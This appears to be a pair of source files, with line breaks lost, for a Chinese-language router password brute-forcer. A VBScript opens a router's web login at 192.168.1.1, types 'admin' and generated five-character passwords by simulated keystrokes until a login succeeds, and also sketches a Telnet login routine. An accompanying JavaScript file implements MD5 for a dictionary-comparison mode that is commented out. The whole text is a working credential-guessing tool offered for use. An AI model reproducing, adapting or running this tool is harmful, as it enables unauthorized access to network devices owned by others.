路由器暴力破解源代码.vbs
'**********************************************************************'''路由器登陆密码暴力破解程序'测试版本''注:此程序针对没有开放telnet端口,而通过界面登陆的路由器,'否则可以直接发送open指令猜解'''**********************************************************************'On Error Resume NextDim WshShell,IE,SC,FSO'*************************基本方法与函数********************************Sub Init()Set WshShell = createobject("wscript.shell")Set FSO = CreateObject("Scripting.FileSystemObject")Set IE = CreateIEApplication("http://192.168.1.1/")Call Login()ScriptExit()End Sub'创建IE应用程序对象Function CreateIEApplication(url)Set objIE = CreateObject("InternetExplorer.Application")With objIE .navigate url .visible=1.left=200.top=200.height=540.width=750.menubar=0.toolbar=0.statusBar=0'.FullScreen = 1End WithWScript.Sleep 1000 Set CreateIEApplication = objIEEnd Function'创建脚本控件对象Function CreateScriptControl(jsCode)Set objSC = CreateObject("MSScriptControl.ScriptControl")objSC.Language = "JScript" objSC.AllowUI = FalseobjSC.AddCode(jsCode) Set CreateScriptControl = objSCEnd Function'查找登陆窗体Function FindLoginForm()Dim count,iDo While count < 15ret = WshShell.AppActivate("Windows 安全")If ret ThenFindLoginForm = True'window.event.returnvalue=false Exit functionElseWScript.Sleep 1000count = count + 1End IfLoop FindLoginForm = falseEnd Function'登陆Sub Login()Dim loginSuccess,i,pwdArray If Not FindLoginForm() ThenExit Sub End If 'MD5密文对比破解'Dim jsCode'jsCode = ReadMD5DictionaryFile("CrackPassword.js")'Set SC = CreateScriptControl(jsCode)'MsgBox SC.Eval("MD5('11')")'直接对比破解pwdArray = GetSpecailArray()'GetPwdArray()For i=Lbound(pwdArray) To Ubound(pwdArray)Do While Not loginSuccessIf EnforceLogin(pwdArray(i)) ThenExit SubEnd If '重新导航IEfindSuccess = False Loop NextMsgBox "没有找到密码"End Sub'强制登陆Function EnforceLogin(pwd)WshShell.SendKeys "admin" WshShell.SendKeys "{TAB}"WshShell.SendKeys pwd WshShell.SendKeys "{TAB}"WshShell.SendKeys "{TAB}"WshShell.SendKeys "{ENTER}"WScript.Sleep 1000If Not IE.Busy Thenif IE.Document.Title <> "登录错误" Then MsgBox pwd '正确密码EnforceLogin = TrueExit FunctionElseWshShell.SendKeys "{TAB}"WshShell.SendKeys "{ENTER}"End If End IfEnforceLogin = FalseEnd Function'对于开放了Telnet端口的路由器可通过此方法登陆Sub TelnetLogin()WshShell.Run("cmd")WScript.Sleep 500WshShell.SendKeys "telnet{ENTER}"WScript.Sleep 500WshShell.SendKeys "open 192.168.1.1"WshShell.SendKeys "{ENTER}"WScript.Sleep 500 WshShell.SendKeys "账户{ENTER}"WshShell.SendKeys "密码{ENTER}"End Sub'退出销毁对象Sub ScriptExit()Set WshShell = NothingIE.Quit()Set IE = NothingWScript.Quit(0)End Sub'*************************************************************'*******************强制破解核心方法与函数********************'读取MD5字典文件Function ReadMD5DictionaryFile(filename)'Set Controller = WScript.CreateObject("WSHController")'Set MyObject=Controller.CreateScript("CrackPassword.js")'MsgBox 1'WScript.ConnectObject MyObject'MyObject.Execute'WScript.Echo MyObject.MD5("123").S11'WScript.DisconnectObject MyObjectDim fileif fso.FileExists(filename) ThenSet f = FSO.OpenTextFile(filename)file = f.ReadAll()End IfSet fso = NothingReadMD5DictionaryFile = fileEnd Function'获取密码组合阵列'可配置,需要生成几位密码的阵列,则用几个FOR'此函数检索5位a-z(ASCII编码97-122)的密码阵列Function GetPwdArray()'Set f = FSO.OpenTextFile("testfile.txt", 2, True)Dim x,pwdArray() x=0for i=97 to 122 for j=97 to 122for k=97 to 122For m=97 To 122For n=97 To 122Redim Preserve pwdArray(x)pwdArray(x) = chr(i) & chr(j) & chr(k) & Chr(m) & Chr(n)'f.Write pwdArray(x) + vbcrlfRedim Preserve pwdArray(x)x = x + 1Nextnextnext nextNext'f.CloseGetPwdArray = pwdArrayEnd Function'获取自定义密码组合阵列'可配置Function GetSpecailArray()Dim ch,ch2,ch3,ch4,x'ch="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@!~^#%{1}"ch=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")ch2=Split("0,1,2,3,4,5,6,7,8,9",",")ch3=Split("a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")ch4=Split("e,d,c,r,f,v,t,g,b,y,h,n",",") x=0l = UBound(ch4)for i=0 to l for j=0 to lfor k=0 to lFor m=0 To lFor n=0 To lRedim Preserve pwdArray(x)pwdArray(x) = ch4(i) & ch4(j) & ch4(k) & ch4(m) & ch4(n)Redim Preserve pwdArray(x)x = x + 1Nextnextnext nextNextGetSpecailArray = pwdArrayEnd Function'**************************************************************Init()'InternetExplorer Object:'http://msdn.microsoft.com/en-us/library/aa752084(v=VS.85).aspx
CrackPassword.js
function MD5(sMessage) { function RotateLeft(lValue, iShiftBits) { return (lValue<<iShiftBits) | (lValue>>>(32-iShiftBits)); } function AddUnsigned(lX,lY) { var lX4,lY4,lX8,lY8,lResult; lX8 = (lX & 0x80000000); lY8 = (lY & 0x80000000); lX4 = (lX & 0x40000000); lY4 = (lY & 0x40000000); lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF); if (lX4 & lY4) return (lResult ^ 0x80000000 ^ lX8 ^ lY8); if (lX4 | lY4) { if (lResult & 0x40000000) return (lResult ^ 0xC0000000 ^ lX8 ^ lY8); else return (lResult ^ 0x40000000 ^ lX8 ^ lY8); } else return (lResult ^ lX8 ^ lY8); } function F(x,y,z) { return (x & y) | ((~x) & z); } function G(x,y,z) { return (x & z) | (y & (~z)); } function H(x,y,z) { return (x ^ y ^ z); } function I(x,y,z) { return (y ^ (x | (~z))); } function FF(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); } function GG(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); } function HH(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); } function II(a,b,c,d,x,s,ac) { a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac)); return AddUnsigned(RotateLeft(a, s), b); } function ConvertToWordArray(sMessage) { var lWordCount; var lMessageLength = sMessage.length; var lNumberOfWords_temp1=lMessageLength + 8; var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64; var lNumberOfWords = (lNumberOfWords_temp2+1)*16; var lWordArray=Array(lNumberOfWords-1); var lBytePosition = 0; var lByteCount = 0; while ( lByteCount < lMessageLength ) { lWordCount = (lByteCount-(lByteCount % 4))/4; lBytePosition = (lByteCount % 4)*8; lWordArray[lWordCount] = (lWordArray[lWordCount] | (sMessage.charCodeAt(lByteCount)<<lBytePosition)); lByteCount++; } lWordCount = (lByteCount-(lByteCount % 4))/4; lBytePosition = (lByteCount % 4)*8; lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80<<lBytePosition); lWordArray[lNumberOfWords-2] = lMessageLength<<3; lWordArray[lNumberOfWords-1] = lMessageLength>>>29; return lWordArray; } function WordToHex(lValue) { var WordToHexValue="",WordToHexValue_temp="",lByte,lCount; for (lCount = 0;lCount<=3;lCount++) { lByte = (lValue>>>(lCount*8)) & 255; WordToHexValue_temp = "0" + lByte.toString(16); WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2); } return WordToHexValue; } var x=Array(); var k,AA,BB,CC,DD,a,b,c,d var S11=7, S12=12, S13=17, S14=22; var S21=5, S22=9 , S23=14, S24=20; var S31=4, S32=11, S33=16, S34=23; var S41=6, S42=10, S43=15, S44=21; // Steps 1 and 2. Append padding bits and length and convert to words x = ConvertToWordArray(sMessage); // Step 3. Initialise a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476; // Step 4. Process the message in 16-word blocks for (k=0;k<x.length;k+=16) { AA=a; BB=b; CC=c; DD=d; a=FF(a,b,c,d,x[k+0], S11,0xD76AA478); d=FF(d,a,b,c,x[k+1], S12,0xE8C7B756); c=FF(c,d,a,b,x[k+2], S13,0x242070DB); b=FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE); a=FF(a,b,c,d,x[k+4], S11,0xF57C0FAF); d=FF(d,a,b,c,x[k+5], S12,0x4787C62A); c=FF(c,d,a,b,x[k+6], S13,0xA8304613); b=FF(b,c,d,a,x[k+7], S14,0xFD469501); a=FF(a,b,c,d,x[k+8], S11,0x698098D8); d=FF(d,a,b,c,x[k+9], S12,0x8B44F7AF); c=FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1); b=FF(b,c,d,a,x[k+11],S14,0x895CD7BE); a=FF(a,b,c,d,x[k+12],S11,0x6B901122); d=FF(d,a,b,c,x[k+13],S12,0xFD987193); c=FF(c,d,a,b,x[k+14],S13,0xA679438E); b=FF(b,c,d,a,x[k+15],S14,0x49B40821); a=GG(a,b,c,d,x[k+1], S21,0xF61E2562); d=GG(d,a,b,c,x[k+6], S22,0xC040B340); c=GG(c,d,a,b,x[k+11],S23,0x265E5A51); b=GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA); a=GG(a,b,c,d,x[k+5], S21,0xD62F105D); d=GG(d,a,b,c,x[k+10],S22,0x2441453); c=GG(c,d,a,b,x[k+15],S23,0xD8A1E681); b=GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8); a=GG(a,b,c,d,x[k+9], S21,0x21E1CDE6); d=GG(d,a,b,c,x[k+14],S22,0xC33707D6); c=GG(c,d,a,b,x[k+3], S23,0xF4D50D87); b=GG(b,c,d,a,x[k+8], S24,0x455A14ED); a=GG(a,b,c,d,x[k+13],S21,0xA9E3E905); d=GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8); c=GG(c,d,a,b,x[k+7], S23,0x676F02D9); b=GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A); a=HH(a,b,c,d,x[k+5], S31,0xFFFA3942); d=HH(d,a,b,c,x[k+8], S32,0x8771F681); c=HH(c,d,a,b,x[k+11],S33,0x6D9D6122); b=HH(b,c,d,a,x[k+14],S34,0xFDE5380C); a=HH(a,b,c,d,x[k+1], S31,0xA4BEEA44); d=HH(d,a,b,c,x[k+4], S32,0x4BDECFA9); c=HH(c,d,a,b,x[k+7], S33,0xF6BB4B60); b=HH(b,c,d,a,x[k+10],S34,0xBEBFBC70); a=HH(a,b,c,d,x[k+13],S31,0x289B7EC6); d=HH(d,a,b,c,x[k+0], S32,0xEAA127FA); c=HH(c,d,a,b,x[k+3], S33,0xD4EF3085); b=HH(b,c,d,a,x[k+6], S34,0x4881D05); a=HH(a,b,c,d,x[k+9], S31,0xD9D4D039); d=HH(d,a,b,c,x[k+12],S32,0xE6DB99E5); c=HH(c,d,a,b,x[k+15],S33,0x1FA27CF8); b=HH(b,c,d,a,x[k+2], S34,0xC4AC5665); a=II(a,b,c,d,x[k+0], S41,0xF4292244); d=II(d,a,b,c,x[k+7], S42,0x432AFF97); c=II(c,d,a,b,x[k+14],S43,0xAB9423A7); b=II(b,c,d,a,x[k+5], S44,0xFC93A039); a=II(a,b,c,d,x[k+12],S41,0x655B59C3); d=II(d,a,b,c,x[k+3], S42,0x8F0CCC92); c=II(c,d,a,b,x[k+10],S43,0xFFEFF47D); b=II(b,c,d,a,x[k+1], S44,0x85845DD1); a=II(a,b,c,d,x[k+8], S41,0x6FA87E4F); d=II(d,a,b,c,x[k+15],S42,0xFE2CE6E0); c=II(c,d,a,b,x[k+6], S43,0xA3014314); b=II(b,c,d,a,x[k+13],S44,0x4E0811A1); a=II(a,b,c,d,x[k+4], S41,0xF7537E82); d=II(d,a,b,c,x[k+11],S42,0xBD3AF235); c=II(c,d,a,b,x[k+2], S43,0x2AD7D2BB); b=II(b,c,d,a,x[k+9], S44,0xEB86D391); a=AddUnsigned(a,AA); b=AddUnsigned(b,BB); c=AddUnsigned(c,CC); d=AddUnsigned(d,DD); } // Step 5. Output the 128 bit digest var temp= WordToHex(a)+WordToHex(b)+WordToHex(c)+WordToHex(d); return temp.toLowerCase();}
